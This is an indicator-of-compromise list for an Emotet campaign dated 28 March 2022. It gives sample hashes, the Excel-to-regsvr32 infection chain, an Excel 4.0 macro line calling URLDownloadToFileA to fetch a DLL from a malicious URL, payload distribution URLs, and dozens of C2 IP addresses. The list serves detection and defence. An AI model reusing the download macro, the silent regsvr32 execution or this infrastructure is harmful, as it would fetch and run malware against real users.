e4_emotet_28.03.2022.txt

Emotet 2022 | epoch4 | 28.03.2022 | 

************************************************************************************************************

.xls f38411e5fafc6b886e79d3a5369047d48beac4c9a5f39d293940601832241598
.dll 5b58a8445c8e7377c21cac82e47d1bdcdc99f7631599ad64e8f2e862511fb941

************************************************************************************************************

EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\invoice.xls

C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll

C:\Windows\SysWOW64\regsvr32.exe /s C:\Windows\SysWOW64\Ufoiaynzgpl\riutrkdrcmbxgzr.ach

http://www.forensisbilisim.com/ankara/bplsmKfaKAwAyavNj/
http://www.fahriefe.com.tr/yargitaykararlari/aVg/
https://www.whow.fr/wp-includes/aZo78JmHBoEmW6fVQ/
https://www.faitmaison.uk/wp-admin/BZMoK/
http://www.parapetyrs.cz/wp-content/uploads/UTnG7GKKkZf/
http://www.drcno.sk/_sub/FcEgwPugDI7wr2/

************************************************************************************************************

.xls de83f556c56ef4cb818e02713ad239374be43450dae73042f5e34b388f080dba
.dll e690b6905fb7b5f3f28b93e31215fc64ff27f4fa1674699831fd36bd38e55fa8

http://dharian.org/_sharedtemplates/D3QgytUZsO7korYQrG/
http://www.construlandia.com/templates/BrRf8QDloUqNyTAdXE/
http://portrettenbeeld.nl/layouts/sfGsF/
http://digitalripple.com/scripts/4ovLPfq/
https://dembek.co.za/sass/30C/
http://www.die13weizen.at/error/aM099L/

************************************************************************************************************

.xls 50861a98f2388a86d681ea20f9efed293182e28a1d748d71a15c1ed85991e8d7
.dll e95a2fc2a8e2771b1c8a210518f959ba6dcc60649be205890600ac131074b0cf
.dll 867a2c059fa089baedf5c2cb65cda586395248e62b6478687d928404852892f3

************************************************************************************************************

Exec >>

EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Payment with a new address.xls"

=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://church.ktc-center.net/PbSkdCOW/", "..\adw.dll")

C:\Windows\SysWow64\regsvr32.exe -s ..\adw.dll

C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ayjudfvdxmswoyv\fqpturxvfsz.mob"

************************************************************************************************************

.dll distro

http://church.ktc-center.net/PbSkdCOW/
https://chobemaster.com/components/gus/
https://christianchapman.com/cgi-bin/gADHL9UXSFUTN/
http://chmiola.net/audio/6OuzyjPS/
http://clanfog.co.uk/_vti_bin/aObJD8vpKaJRLKgoX6i/
https://cipes.gob.mx/css/A046XJg/

			
c2's

216.120.236.62:8080
189.232.46.161:443
51.91.76.89:8080
217.182.25.250:8080
119.193.124.41:7080
159.8.59.82:8080
195.201.151.129:8080
58.227.42.236:80
212.24.98.99:8080
138.185.72.26:8080
131.100.24.231:80
192.99.251.50:443
158.69.222.101:443
197.242.150.244:8080
50.116.54.215:443
188.44.20.25:443
212.237.17.99:8080
153.126.146.25:7080
103.75.201.2:443
5.9.116.246:8080
185.8.212.130:7080
164.68.99.3:8080
45.118.135.203:7080
107.182.225.142:8080
151.106.112.196:8080
209.126.98.206:8080
79.172.212.216:8080
51.91.7.5:8080
72.15.201.15:8080
196.218.30.83:443
173.212.193.249:8080
82.165.152.127:8080
101.50.0.91:8080
103.43.46.182:443
216.158.226.206:443
167.172.253.162:8080
159.65.88.10:8080
50.30.40.196:8080
129.232.188.93:443
45.176.232.124:443
203.114.109.124:443
167.99.115.35:8080
195.154.133.20:443
51.254.140.238:7080
206.188.212.92:8080
31.24.158.56:8080
178.79.147.66:8080
45.118.115.99:8080
45.142.114.231:8080
185.157.82.211:8080
209.250.246.206:443
189.126.111.200:7080
1.234.21.73:7080
176.104.106.96:8080
201.94.166.162:443
110.232.117.186:8080
146.59.226.45:443
46.55.222.11:443
1.234.2.232:8080
134.122.66.193:8080
176.56.128.118:443